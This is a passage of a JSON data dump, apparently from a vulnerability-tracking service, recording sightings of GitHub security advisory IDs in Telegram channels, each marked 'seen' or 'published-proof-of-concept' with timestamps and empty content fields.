"73d4ad4f-8ec1-4c9e-8a32-fab01719086d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PPP5-5V6C-4JWP", "type": "seen", "source": "Telegram/9UoOc_Mml4hO1LPqEQWig8KjS1ZNRBXJeCq-u3-UaU0LNh0", "content": "", "creation_timestamp": "2026-03-27T23:27:55.000000Z"}, {"uuid": "24a96667-5bf8-42dc-95ce-1a82c5b5ea5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QG87-CF56-2RMR", "type": "seen", "source": "Telegram/9UoOc_Mml4hO1LPqEQWig8KjS1ZNRBXJeCq-u3-UaU0LNh0", "content": "", "creation_timestamp": "2026-03-27T23:27:55.000000Z"}, {"uuid": "860a362a-f0c0-409f-bf3a-b51fd0a4a6c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q67F-28XG-22RW", "type": "seen", "source": "Telegram/9UoOc_Mml4hO1LPqEQWig8KjS1ZNRBXJeCq-u3-UaU0LNh0", "content": "", "creation_timestamp": "2026-03-27T23:27:55.000000Z"}, {"uuid": "c925fac0-b628-4bcc-8af7-909fd96f7b76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8C4J-F57C-35CF", "type": "seen", "source": "Telegram/EI25wC4yN3TaatXDJQ6U_03Lar3nhYMfqPNXio5Iaw2cNO8", "content": "", "creation_timestamp": "2026-03-27T23:28:03.000000Z"}, {"uuid": "24929d1e-1dba-4ec9-a450-05c8e46f8254", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2W6W-674Q-4C4Q", "type": "seen", "source": "Telegram/EI25wC4yN3TaatXDJQ6U_03Lar3nhYMfqPNXio5Iaw2cNO8", "content": "", "creation_timestamp": "2026-03-27T23:28:03.000000Z"}, {"uuid": "73c9d9f1-57a9-414e-8aa8-f60599d483c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2328-F5F3-GJ25", "type": "seen", "source": "Telegram/EI25wC4yN3TaatXDJQ6U_03Lar3nhYMfqPNXio5Iaw2cNO8", "content": "", "creation_timestamp": "2026-03-27T23:28:03.000000Z"}, {"uuid": "e9ec07c2-6fe5-492f-b11a-8208f3ad956a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-87J9-M7X6-HVW2", "type": "seen", "source": "Telegram/EI25wC4yN3TaatXDJQ6U_03Lar3nhYMfqPNXio5Iaw2cNO8", "content": "", "creation_timestamp": "2026-03-27T23:28:03.000000Z"}, {"uuid": "e6540c88-49d1-40c0-a43f-acb92c7e7327", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3MFM-83XF-C92R", "type": "seen", "source": "Telegram/EI25wC4yN3TaatXDJQ6U_03Lar3nhYMfqPNXio5Iaw2cNO8", "content": "", "creation_timestamp": "2026-03-27T23:28:03.000000Z"}, {"uuid": "f8eaac40-0a3a-430e-933d-0df2b9f01c3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9CX6-37PM-9JFF", "type": "seen", "source": "Telegram/oIt8DGorr8cyCUyQDoJ69KF18sDdBCT7_fq8G95rr4FMqvI", "content": "", "creation_timestamp": "2026-03-30T10:01:09.000000Z"}, {"uuid": "c23d52ac-8bf0-469a-9750-533dcd07390b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XF99-J42Q-5W5P", "type": "seen", "source": "Telegram/JZ1l27ygigxS-8YXSWLEZI05cz4uxozp1fQc7J9Y59z0mpU", "content": "", "creation_timestamp": "2026-03-29T15:20:32.000000Z"}, {"uuid": "ebc30d5a-5135-4b8b-961a-4a856877c8fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63F5-HHC7-CX6P", "type": "seen", "source": "Telegram/JZ1l27ygigxS-8YXSWLEZI05cz4uxozp1fQc7J9Y59z0mpU", "content": "", "creation_timestamp": "2026-03-29T15:20:32.000000Z"}, {"uuid": "92dcd2a7-2ec8-429e-b13e-16f3175e7f3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQ3F-VJWW-8RQ7", "type": "seen", "source": "Telegram/JZ1l27ygigxS-8YXSWLEZI05cz4uxozp1fQc7J9Y59z0mpU", "content": "", "creation_timestamp": "2026-03-29T15:20:32.000000Z"}, {"uuid": "6eeb577f-0b42-4d00-a477-d110d9eaf3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR7J-G7JV-H5MP", "type": "seen", "source": "Telegram/JZ1l27ygigxS-8YXSWLEZI05cz4uxozp1fQc7J9Y59z0mpU", "content": "", "creation_timestamp": "2026-03-29T15:20:32.000000Z"}, {"uuid": "33cd1795-e940-4977-81de-f7e8a17ccdad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6FQ7-PGJ3-6CFP", "type": "seen", "source": "Telegram/LBnoZEkIgYZcAalPk_uHtbpp5d2DNhQfVZICyQC_gDXFXXQ", "content": "", "creation_timestamp": "2026-03-27T15:17:36.000000Z"}, {"uuid": "c37f5b10-81a0-43bd-b3ee-7c16db593dfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q44-85GC-CJVF", "type": "published-proof-of-concept", "source": "Telegram/g4UVY8i00Fvp2poaqkkwyG2Aov1eL0WpFh7BWtAhzFw0vL8", "content": "", "creation_timestamp": "2026-03-27T17:22:00.000000Z"}, {"uuid": "ed4adc3c-2149-4a3b-a92c-ee5708ae9bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XH67-63Q3-HF7G", "type": "published-proof-of-concept", "source": "Telegram/g4UVY8i00Fvp2poaqkkwyG2Aov1eL0WpFh7BWtAhzFw0vL8", "content": "", "creation_timestamp": "2026-03-27T17:22:00.000000Z"}, {"uuid": "257358df-1fc9-4a9d-ac97-f8d5067e6e26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83W9-9JF6-88VF", "type": "published-proof-of-concept", "source": "Telegram/g4UVY8i00Fvp2poaqkkwyG2Aov1eL0WpFh7BWtAhzFw0vL8", "content": "", "creation_timestamp": "2026-03-27T17:22:00.000000Z"}, {"uuid": "4f80b565-d423-45f3-b0bc-c3e42618b25f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-584P-RPVQ-35VF", "type": "published-proof-of-concept", "source": "Telegram/XCH0TsqFcgtqQSEM226PLv68rO7cMcwSSZTFwAARVhm43GQ", "content": "", "creation_timestamp": "2026-03-27T19:19:15.000000Z"}, {"uuid": "386f641e-ac91-47ad-a3f3-6d977f913cff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FJ74-QXJ7-R3VC", "type": "published-proof-of-concept", "source": "Telegram/XCH0TsqFcgtqQSEM226PLv68rO7cMcwSSZTFwAARVhm43GQ", "content": "", "creation_timestamp": "2026-03-27T19:19:15.000000Z"}, {"uuid": "a888ca24-f5bb-47df-b04b-084032d9c724", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4GMR-2VC8-7QH3", "type": "published-proof-of-concept", "source": "Telegram/B1-lnNSHpl_GL4tzlck3EB0WXwjfJllp4cXItiyc0oKB0vU", "content": "", "creation_timestamp": "2026-03-27T21:23:14.000000Z"}, {"uuid": "d89f6bb8-a33f-40bb-a181-fdd9fbc90bd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9FJ-CFPG-GRVV", "type": "published-proof-of-concept", "source": "Telegram/B1-lnNSHpl_GL4tzlck3EB0WXwjfJllp4cXItiyc0oKB0vU", "content": "", "creation_timestamp": "2026-03-27T21:23:14.000000Z"}, {"uuid": "84d87f95-53e7-470d-bf34-d34ac0413837", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45G3-CV93-Q59V", "type": "published-proof-of-concept", "source": "Telegram/GtEl0gL_3vlqQaCU7OfUhEkhd2JzglfpejZoGd3NHIPeYno", "content": "", "creation_timestamp": "2026-03-27T23:28:35.000000Z"}, {"uuid": "a2e491c8-82ad-454a-90c4-6afcf5a0bb7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F5MF-3R52-R83W", "type": "seen", "source": "Telegram/bOji7_uFGKpjQ-Vv3CFZvWqxNHLg4F03MY6E5pxai3iB8W0", "content": "", "creation_timestamp": "2026-03-29T15:20:09.000000Z"}, {"uuid": "c360408d-647f-49fa-bf3b-fde0b6c53064", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QC36-X95H-7J53", "type": "seen", "source": "Telegram/bOji7_uFGKpjQ-Vv3CFZvWqxNHLg4F03MY6E5pxai3iB8W0", "content": "", "creation_timestamp": "2026-03-29T15:20:09.000000Z"}, {"uuid": "3e8dace9-e7f1-4cc2-aaf2-5fe355ac456c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F8R2-VG7X-GH8M", "type": "seen", "source": "Telegram/bOji7_uFGKpjQ-Vv3CFZvWqxNHLg4F03MY6E5pxai3iB8W0", "content": "", "creation_timestamp": "2026-03-29T15:20:09.000000Z"}, {"uuid": "895a902b-3f15-4cf3-91de-26f9fb28c1e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M468-XCM6-FXG4", "type": "published-proof-of-concept", "source": "Telegram/fjirMqbI7HbDe3OLZhJWgKP9i_Qtg8z94oAYRFGU8rTUaV0", "content": "", "creation_timestamp": "2026-03-30T19:17:51.000000Z"}, {"uuid": "f1fad451-2c82-4beb-972f-1334f6c3b4ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CR-9H7Q-4QXQ", "type": "seen", "source": "Telegram/GoYhMbIBJrUQVgFRnoM40D1rFway6I5o3ckcxiQjEVHvvo4", "content": "", "creation_timestamp": "2026-03-31T13:19:41.000000Z"}, {"uuid": "1aa604a4-bec8-48fa-aff4-9ecaba3dee13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68P4-J234-43MV", "type": "seen", "source": "Telegram/8TNuFRjRJBw5r6zwiOXWd_T-cqnzTtiBnsbsFB7NS1OTWS8", "content": "", "creation_timestamp": "2026-03-31T23:20:56.000000Z"}, {"uuid": "9022561a-d9f5-4367-8080-248327519cb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VPR-4FGW-F69H", "type": "published-proof-of-concept", "source": "Telegram/W-ZMhqLt3Z16f8AdFiB8UF-gG99_9hpwzW6X3s6aq-w7Q74", "content": "", "creation_timestamp": "2026-04-01T23:27:26.000000Z"}, {"uuid": "0123100b-d5b4-4803-81b9-4e45d2df6a98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4V5-RWR2-Q7R4", "type": "seen", "source": "Telegram/9bl7FEfQKeFpZFPlYLUaNlRChLBL7dB3Syrn3BTLiX1da84", "content": "", "creation_timestamp": "2026-04-01T23:27:43.000000Z"}, {"uuid": "8f48fe7f-fb38-4ac1-a7e5-3fcdf047da7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M69H-JM2F-2PV8", "type": "published-proof-of-concept", "source": "Telegram/cXzVIGK7PQfwtmMw_RkRYvJTJsFs-s6Ys2jSidGnYSoPd-U", "content": "", "creation_timestamp": "2026-03-29T15:19:56.000000Z"}, {"uuid": "992261fc-482e-4ab6-bc8a-4d7d79c2b013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W7M-58CG-CMFF", "type": "published-proof-of-concept", "source": "Telegram/cXzVIGK7PQfwtmMw_RkRYvJTJsFs-s6Ys2jSidGnYSoPd-U", "content": "", "creation_timestamp": "2026-03-29T15:19:56.000000Z"}, {"uuid": "2ac6e59a-c7c1-490a-85e4-11264b1b1804", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7VR-GR74-94P8", "type": "published-proof-of-concept", "source": "Telegram/cXzVIGK7PQfwtmMw_RkRYvJTJsFs-s6Ys2jSidGnYSoPd-U", "content": "", "creation_timestamp": "2026-03-29T15:19:56.000000Z"}, {"uuid": "948fb738-6602-423c-b459-b44cf3e74e45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JPW-HJ22-2XMC", "type": "published-proof-of-concept", "source": "Telegram/cXzVIGK7PQfwtmMw_RkRYvJTJsFs-s6Ys2jSidGnYSoPd-U", "content": "", "creation_timestamp": "2026-03-29T15:19:56.000000Z"}, {"uuid": "7d8b4e59-e619-4eea-808a-379dffd87ab6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VMHQ-CQM9-6P7Q", "type": "seen", "source": "Telegram/bOji7_uFGKpjQ-Vv3CFZvWqxNHLg4F03MY6E5pxai3iB8W0", "content": "", "creation_timestamp": "2026-03-29T15:20:09.000000Z"}, {"uuid": "67631f38-fdd9-44e8-9c4f-489ea6a408db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H7G-X2PX-94HJ", "type": "seen", "source": "Telegram/nb8fCm1TK_w7DFYOlnuooYH-uWzxRBf3GinTZz9uDDCr2nY", "content": "", "creation_timestamp": "2026-03-29T15:20:39.000000Z"}, {"uuid": "7f7e54fc-f3e2-4258-b0c8-c397db1bfc55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2Q88-39RH-GXVV", "type": "seen", "source": "Telegram/WwaVaWmCpWfeYuJ8P8IqcUlHCUAeEgjmrCmKGvAa3A2q2J0", "content": "", "creation_timestamp": "2026-04-07T23:21:06.000000Z"}, {"uuid": "b7845bff-ceaa-4640-9145-17b1c5537193", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7P8-XQ5M-436C", "type": "seen", "source": "Telegram/Jgs5105KRNeeN6M_e9oFeQT01tz9bvpQqKtTaGf0YvrxH7I", "content": "", "creation_timestamp": "2026-04-08T15:16:41.000000Z"}, {"uuid": "f7be7d15-3a3b-4cb1-9a82-f5715d9c0325", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P34F-488J-5CWV", "type": "seen", "source": "Telegram/FBQIm_tKRYvjgrE67wEx022AiT_PIajHaRZbB9YF5GqyRME", "content": "", "creation_timestamp": "2026-04-08T15:16:22.000000Z"}, {"uuid": "25fe5336-59c9-4109-ada4-cda0d26f0694", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFHX-5459-QHQH", "type": "seen", "source": "Telegram/V1TSqfmZJdf_aKpoymM9Em6O2uNbTcVHb7f-sjGIlQ-q3Tg", "content": "", "creation_timestamp": "2026-04-08T17:17:30.000000Z"}, {"uuid": "fa74e25d-2ee0-470d-b7bf-f37159b8a6d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VG9H-JX4V-CWX2", "type": "published-proof-of-concept", "source": "Telegram/ppPYRB7DfIS8K7XD1dDGxWPkeD0WXLmtAHjzWOZBPf3GFDk", "content": "", "creation_timestamp": "2026-04-09T01:28:04.000000Z"}, {"uuid": "38edf493-f9b9-40d2-bfb3-0000782c6156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7Q8R-VPQ3-89M7", "type": "seen", "source": "Telegram/lYHJ2uqEkk9SWNnUth8Z9R1ezNKbfqND5wGUosjkyCOBSr0", "content": "", "creation_timestamp": "2026-03-26T23:19:48.000000Z"}, {"uuid": "c2a17319-62b2-4c1d-a296-9d913a55c4f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CWHC-53HW-QQX6", "type": "seen", "source": "Telegram/lYHJ2uqEkk9SWNnUth8Z9R1ezNKbfqND5wGUosjkyCOBSr0", "content": "", "creation_timestamp": "2026-03-26T23:19:48.000000Z"}, {"uuid": "29522a9f-32d5-4023-9ae5-fd8a652f2992", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-83XR-5XXR-MH92", "type": "published-proof-of-concept", "source": "Telegram/iwwl46KpLYwipk_JFr9bJW43ngNWdoc7X8GY9RAN-oHOG28", "content": "", "creation_timestamp": "2026-03-27T01:18:44.000000Z"}, {"uuid": "3de89d54-2628-414e-aa27-0b13c67e06ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F27W-VCWJ-C954", "type": "seen", "source": "Telegram/rgowYjXIbIqH_AY83QR77NdcMiEs7Q8IlbaGHk6-omsHWj8", "content": "", "creation_timestamp": "2026-03-30T15:22:38.000000Z"}, {"uuid": "bfaa9fb2-e4cb-4dd2-8350-2757b53131ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-363V-5RH8-23WG", "type": "seen", "source": "Telegram/oT6t4NRMpgoX3zBs2D6gNNWCx9cAFlVoBXSXqbTX6Ejwqdk", "content": "", "creation_timestamp": "2026-03-27T19:19:24.000000Z"}, {"uuid": "83cb0d11-9fa7-4865-8925-ee5c8731ac2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6Q6H-J7HJ-3R64", "type": "seen", "source": "Telegram/rRTxpaJmTYQmE8Q4CNoqCv49oiBv1g4u8JDlKqXnTcwR7sk", "content": "", "creation_timestamp": "2026-03-27T23:28:21.000000Z"}, {"uuid": "b6e6f819-c171-428b-922a-daa1c0bee673", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJPJ-3MR7-GCPF", "type": "seen", "source": "Telegram/rRTxpaJmTYQmE8Q4CNoqCv49oiBv1g4u8JDlKqXnTcwR7sk", "content": "", "creation_timestamp": "2026-03-27T23:28:21.000000Z"}, {"uuid": "94038426-f339-486c-96c9-2692890b7810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QVQR-5CV7-WH35", "type": "seen", "source": "Telegram/rRTxpaJmTYQmE8Q4CNoqCv49oiBv1g4u8JDlKqXnTcwR7sk", "content": "", "creation_timestamp": "2026-03-27T23:28:21.000000Z"}, {"uuid": "2bcfe432-f07d-46cb-bbc7-7a31a3206a4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WP4G-QW9J-WFJG", "type": "seen", "source": "Telegram/rRTxpaJmTYQmE8Q4CNoqCv49oiBv1g4u8JDlKqXnTcwR7sk", "content": "", "creation_timestamp": "2026-03-27T23:28:21.000000Z"}, {"uuid": "a010db72-907e-41a3-b714-6d24d2ad73a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPHV-H674-5HP2", "type": "published-proof-of-concept", "source": "Telegram/nyeqn3leA21ahM9eDPOdcOfg88eaiSN6Cc1j2Af2p1JdwTU", "content": "", "creation_timestamp": "2026-04-08T23:32:54.000000Z"}, {"uuid": "bdd40734-5447-422b-bb5b-25a3df59379e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFVC-G4FC-PQHX", "type": "published-proof-of-concept", "source": "Telegram/uNEbWTFRO9kglbQXnY7zSMHaUxTxgzOMmWKv2o-GlQMO0RY", "content": "", "creation_timestamp": "2026-04-09T01:27:25.000000Z"}, {"uuid": "e6d9adbd-006b-4ce3-ad54-45b7879f49b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6PH-XCQ9-QXXJ", "type": "published-proof-of-concept", "source": "Telegram/uNEbWTFRO9kglbQXnY7zSMHaUxTxgzOMmWKv2o-GlQMO0RY", "content": "", "creation_timestamp": "2026-04-09T01:27:25.000000Z"}, {"uuid": "5dbd14f4-656d-416d-b51e-ef41ad41f9cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RPJR-985C-QHVM", "type": "seen", "source": "Telegram/qLRVxcBpXT_mPFtTmfhugZI-eibNxK7vt9WwygicfOox0-Q", "content": "", "creation_timestamp": "2026-03-30T23:20:18.000000Z"}, {"uuid": "d1fdb032-561d-4a08-8668-19728c3cd73b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV78-CWP4-8R7R", "type": "published-proof-of-concept", "source": "Telegram/bbla1pabQ6PMuVKeZ-DwTmBlqOcXGSdR93YlyGpOXR1ezik", "content": "", "creation_timestamp": "2026-03-31T03:17:00.000000Z"}, {"uuid": "c82122bd-85c6-4def-aa96-5055086ff6cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5FM-FGVX-32JQ", "type": "published-proof-of-concept", "source": "Telegram/E6DSeVNy1uX9gptW9gUevVOkWF-Be1dfF2SO_nx5Xk2F0EI", "content": "", "creation_timestamp": "2026-03-31T19:20:34.000000Z"}, {"uuid": "13f0da51-ed58-4e43-9aa2-edbd81e6d16f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVJW-FJQ5-68HF", "type": "published-proof-of-concept", "source": "Telegram/E6DSeVNy1uX9gptW9gUevVOkWF-Be1dfF2SO_nx5Xk2F0EI", "content": "", "creation_timestamp": "2026-03-31T19:20:34.000000Z"}, {"uuid": "723b5504-95b6-4c94-ab1c-6197ed9f60b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RQCX-MC9W-PJXP", "type": "published-proof-of-concept", "source": "Telegram/E6DSeVNy1uX9gptW9gUevVOkWF-Be1dfF2SO_nx5Xk2F0EI", "content": "", "creation_timestamp": "2026-03-31T19:20:34.000000Z"}, {"uuid": "35a7ac7f-6d70-4c5e-9d0e-e275a6d84031", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW77-45GV-P728", "type": "seen", "source": "Telegram/jSTFa01DEWFRhQKHtf4fP3tqxxyDE1Jfuh4yALHVDvczs38", "content": "", "creation_timestamp": "2026-03-31T13:19:01.000000Z"}, {"uuid": "4ee3bb5f-2e7e-4afb-9d20-7369947bd174", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2F6-PWVX-R275", "type": "seen", "source": "Telegram/jSTFa01DEWFRhQKHtf4fP3tqxxyDE1Jfuh4yALHVDvczs38", "content": "", "creation_timestamp": "2026-03-31T13:19:01.000000Z"}, {"uuid": "0fb51c32-1e76-4914-be06-46a3d65d1cc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99QW-6MR3-36QR", "type": "seen", "source": "Telegram/jSTFa01DEWFRhQKHtf4fP3tqxxyDE1Jfuh4yALHVDvczs38", "content": "", "creation_timestamp": "2026-03-31T13:19:01.000000Z"}, {"uuid": "c25ed834-572b-4d07-874a-6916196156d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5M9R-P9G7-679C", "type": "published-proof-of-concept", "source": "Telegram/bc0dtnMAVwN1UZgcMoKZPcvjFdUYL45B0PcMRVU30Ps4cSo", "content": "", "creation_timestamp": "2026-03-31T13:19:26.000000Z"}, {"uuid": "c10e7c0d-1607-4b21-a017-532294090149", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6C5X-3H35-VVW2", "type": "seen", "source": "Telegram/nw5w-o_hs-CK0Rjuv5tJSQsl41JpqhSQHTKMS_4QN8816OY", "content": "", "creation_timestamp": "2026-03-31T17:25:19.000000Z"}, {"uuid": "61ceabca-92af-4250-a798-cf29e09b0542", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MV9J-8JVG-J8MR", "type": "seen", "source": "Telegram/nw5w-o_hs-CK0Rjuv5tJSQsl41JpqhSQHTKMS_4QN8816OY", "content": "", "creation_timestamp": "2026-03-31T17:25:19.000000Z"}, {"uuid": "f932ad8f-8c4c-4b92-a1ea-66aca6b7926a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X9VJ-5M4J-9MFV", "type": "seen", "source": 